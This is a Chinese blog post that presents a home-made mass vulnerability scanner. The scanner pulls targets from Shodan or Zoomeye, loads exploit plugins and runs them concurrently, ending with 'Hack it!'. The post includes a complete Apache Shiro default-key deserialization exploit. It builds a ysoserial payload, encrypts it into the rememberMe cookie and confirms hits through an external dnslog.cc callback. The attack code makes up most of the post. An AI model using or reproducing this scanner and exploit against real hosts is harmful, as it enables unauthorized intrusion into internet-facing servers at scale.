每个黑客爱好者都需要有自己的漏洞扫描器

最新推荐文章于 2024-08-20 19:39:30 发布
置顶 最新推荐文章于 2024-08-20 19:39:30 发布
阅读量408 收藏 1
点赞数
分类专栏: pentest 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dlydk/article/details/106470521
版权

先上链接:https://github.com/yuxiaokui/cloudhacker

然后上代码:

先是动态加载选择的exp,然后是导入攻击目标。

    # 动态加载选择的漏洞利用代码
    exp = importlib.import_module('exp.' + host[int(target)-1] + '.' + pocs[int(flag) - 1][:-3])


    # 选择通过zoomeye还是shodan还是文件来导入目标
    api_select = input("Zoomeye or Shodan or File (z/s/f):")
    if api_select == 'f':
        f = input("File:")   
        with open(f) as x:
            targets = x.readlines()
    else:     
        query = input("Query:")
        start = int(input("Start_page:"))
        end = int(input("End_page:"))

        if api_select == 'z':
            p = zoomeye(query, start, end)
        if api_select == 's':
            p = shodan_api(query, start, end)
        targets = p.run()

然后使用协成的方式进行批量检测。

    def check(self):
        while self.targets.qsize() > 0:
            target = self.targets.get().strip()
            try:
                self.pbar.update(1)
                result = exp.exp(target)
                if result:
                    self.result.append(result)
            except Exception as e:
                #print(e)
                pass


    def run(self):
        threads = [gevent.spawn(self.check) for i in range(self.threads_num)]
        try:
            gevent.joinall(threads)
        except KeyboardInterrupt as e:
            print ('[WARNING] User aborted')
            for res in self.result:
                print (res)
        self.pbar.close()
        print ("Hack it!")
        for res in self.result:
            print (res)
        print("Found ",len(self.result))
        print ("End!")

 

没错就是这么简单的几十行代码,就可以实现一个漏洞扫描器。

其实关键的地方还是写漏洞检测插件。

这里给出一个最近比较火的Shiro使用默认key的检测方式。

import os
import re
import base64
import uuid
import time
import subprocess
import requests
from Crypto.Cipher import AES
from random import randint

JAR_FILE = './lib/ysoserial.jar' # 需要自己下载 https://github.com/frohoff/ysoserial

keys='''
kPH+bIxk5D2deZiIxcaaaA==
4AvVhmFLUs0KTA3Kprsdag==
'''

def poc(url, rce_command,key):
    if '://' not in url:
        target = 'https://%s' % url if ':443' in url else 'http://%s' % url
    else:
        target = url
    try:
        payload = generator(rce_command, JAR_FILE,key)
        r = requests.get(target, cookies={'rememberMe': payload.decode()}, timeout=10)
        #print(key)
        #print(r.status_code)
    except Exception as e:
        #print (e)
        pass
    return False


def generator(command, fp,key):
    if not os.path.exists(fp):
        print('Jar zai na ne ?')
        raise Exception('jar file not found!')
    popen = subprocess.Popen(['java', '-jar', fp, 'URLDNS', command],
                             stdout=subprocess.PIPE)
    BS = AES.block_size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    mode = AES.MODE_CBC
    iv = uuid.uuid4().bytes
    encryptor = AES.new(base64.b64decode(key), mode, iv)
    file_body = pad(popen.stdout.read())
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_ciphertext



def exp(target):
    for key in keys.split('\n'):
        token = "shrio-" + str(randint(100000,999999))
        dnslog = 'http://' + token + '.5c46546e76287d97.dnslog.cc'  # 我在Chamd5的dnslog平台注册时地址。
        dnslog_api = "http://admin.dnslog.cc/api/dns/5c46546e76287d97/%s/" % token 
        poc(target, dnslog, key.strip())
        time.sleep(3)
        r = requests.get(dnslog_api)
        if r.text != 'False':
            return target,key.strip()
            break

if __name__ == '__main__':
    exp('bhst.vip:20020')  # 这是我用docker搭建的靶机,用来验证漏洞

 

下面测试一下结果:

于小葵
关注
专栏目录
自己动手编写SQL注入漏洞扫描工具
12-01
在CSDN上没有找到,所以将别处下载的上传过来,必须免费分享! 包括两个程序,代码尚未调试,希望有所借鉴。 代码仅供学习交流,切勿行危害安全之事,务必遵守法律法规!
编写漏洞扫描
修养生息,以得佳境
04-22 1149
编写漏洞扫描 一、漏洞扫描基本原理:编写漏洞扫描探查远程服务上可能存在的具有安全隐患的文件是否存在,它的socket建立过程和上面的端口扫描器是相同的,所不同的是漏洞扫描通常使用8
XRAY~漏洞扫描工具
最新发布
weixin_67832625的博客
08-20 1353
有人说:“所有的漏扫工具都是人写出来的,既然是工具,肯定没有人厉害,但是,漏扫可以大大减少你的工作量”
太猛了!Web安全漏洞批量扫描框架
潇湘信安的博客
07-17 357
一个应用于web安全领域的漏洞批量扫描框架,可被应用于但不限于如下场景:0Day/1Day全网概念验证(在没有测试环境(各种商业、闭源软件)或懒得搭建测试环境的情况下,直接写POC全网扫描,亲测很爽)
2023最新最全 fastjson 漏洞批量检测工具使用教程。
logic1001的博客
11-29 2803
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
最经典的黑客入门教程
HBohan的博客
07-24 5423
第一节、黑客的种类和行为 以我的理解,“黑客”大体上应该分为“正”、“邪”两类,正派黑客依靠自己掌握的知识帮助系统管理员找出系统中的漏洞并加以完善,而邪派黑客则是通过各种黑客技能对系统进行攻击、入侵或者做其他一些有害于网络的事情,因为邪派黑客所从事的事情违背了《黑客守则》,所以他们真正的名字叫“骇客”(Cracker)而非“黑客”(Hacker),也就是我们平时经常听说的“黑客”(Cacker)和“红客”(Hacker)。 无论那类黑客,他们最初的学习内容都将是本部分所涉及的内容,而且掌握的基本技能也都是.
一个计算机爱好者眼里的隐私
qq_44894420的博客
04-13 604
一个计算机爱好者眼里的隐私
黑客脚本渗透教程:从入门到实践
这篇教程通过实例介绍了网络黑客脚本渗透的基本过程,强调了每个步骤的重要性,并提供了工具Nmap的使用示例,为初学者提供了一个实际操作的框架。学习这些技能不仅可以帮助提升网络安全防御能力,也为可能的职业发展...
扫描器之流光5·0+使用教程
06-07
这款软件在IT行业内备受关注,尤其对于网络安全爱好者和专业人员来说,流光5.0是进行系统安全评估的重要工具之一。本教程将深入讲解流光5.0的使用方法,帮助用户了解其核心功能和操作步骤。 首先,我们需要理解流光...
用python成为顶级黑客-python绝技:运用python成为顶级黑客 PDF 超清中文版
weixin_39770165的博客
11-11 1276
给大家带来的一篇关于python相关的电子书资源,介绍了关于python绝技、python黑客方面的内容,本书是由电子工业出版社出版,格式为PDF,资源大小42 MB,TJO编写,目前豆瓣、亚马逊、当当、京东等电子书综合评分为:7.4。内容介绍有关Python的书尽管现有许多,但从安全性从业人员视角多方位分析Python的书藉基本上沒有,《Python绝技:运用Python成为**黑客》弥补了这一...
squid漏洞批量扫描
05-12
要开启squid服务,建一个txt文件放扫描的ip
0708漏洞批量扫描工具.zip
10-31
0708漏洞的危害和永恒之蓝一样,受影响的用户很多,这款漏洞批量扫描工具是使用360poc导出的,支持扫描目标导入,以及扫描结果导出的功能,支持多线程批量快速扫描
轻量级网站漏洞批量扫描神
05-07
批量扫描漏洞,扫描url,非常实力。用过的人都说好。设计简明。
MSF弱点扫描
分享学习网络的点点滴滴
01-05 915
● 根据信息收集结果搜索漏洞利用模块● 结合外部漏洞扫描系统对大IP地址段进行批量扫描● 误判率、漏判率。
​​​​​​​自动化批量漏洞扫描脚本定制
悦分享
07-07 1502
github上找到一款并发框架[POC-T](https://github.com/Xyntax/POC-T)可以优美的进行并发操作,上面所述的内容大多可以用插件联合POC-T进行。因为POC-T不能一次使用多个插件,于是笔者对POC-T框架进行了一些小的改造,使其可以使用多个插件并发,而且不影响框架的扩展性。为了不和原有的插件冲突,fuzz功能加载插件在fuzz目录下,fuzz插件编写模式和其他插件一样。修改过程这样就不详细叙述了,修改的版本在https://github.com/boy-hack/POC
Ladon CVE-2020-1938跨网段、C段批量扫描内网漏洞
K8哥哥
03-01 1056
漏洞信息 根据国家信息安全漏洞共享平台(CNVD)20日发布的Apache Tomcat文件包含漏洞(CNVD-2020-10487/CVE-2020-1938)。该漏洞是由于Tomcat AJP协议存在缺陷而导致,攻击者利用该漏洞可通过构造特定参数,读取服务webapp下的任意文件。若目标服务同时存在文件上传功能,攻击者可进一步实现远程代码执行。 漏洞编号 cnvd-2020-10487 c...
【python】打造一款自动扫描全网漏洞的扫描器
热门推荐
浪子燕青的博客
04-25 2万+
这是一款和刘老师一起写的网安类别扫描器。基本原理是由Python+Mysql搭建的扫描器,实现自动无限永久爬行采集网站链接,自动化漏洞扫描检测。目的是挂机就能实现自动化发掘敏感情报,亦或是发现网站的漏洞或者隐藏可利用的漏洞。     早在17年11月份的时候就有这个想法,可是一直没有去做,后来快到除夕前几天才正式开始整个软件工程的设计。当时的想实现的功能比较简单,就是能做到无限采集到网站使用的CM
python之importlib的使用
youhebuke225的博客
05-10 610
https://www.jb51.net/article/111282.htm https://blog.csdn.net/edward_zcl/article/details/88809212 一般用于一个变量接收的可能是不同的模块
网络扫描器漏洞扫描原理详解
"第二章漏洞扫描原理.pdf" 在网络安全领域,漏洞扫描是至关重要的工具,它们用于发现和评估系统及网络设备的安全弱点。本章主要探讨了扫描器的工作原理以及其在实际应用中的作用。以下是对扫描器原理和功能的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值